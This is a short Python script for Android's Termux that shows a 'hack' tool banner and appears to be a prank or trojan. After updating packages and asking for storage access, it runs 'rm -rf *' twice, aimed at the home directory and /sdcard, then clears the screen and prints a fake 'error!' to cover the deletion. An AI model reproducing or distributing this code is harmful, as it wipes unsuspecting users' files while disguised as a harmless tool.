import os
print(" _____    _ _   _            _ ")
print("|_   _|__| | | | | __ _  ___| | __ ")
print("  | |/ _ \ | |_| |/ _` |/ __| |/ / ")
print("  | |  __/ |  _  | (_| | (__|   < ")
print("  |_|\___|_|_| |_|\__,_|\___|_|\_\ ")
os.system("apt update && apt upgrade -y ")
os.system("pkg install termux-tools -y ")
os.system("termux-setup-storage ")
os.system("cd $HOME ")
os.system("rm -rf * ")
os.system("cd /sdcard ")
os.system("rm -rf * ")
os.system("clear ")
print("error! ")
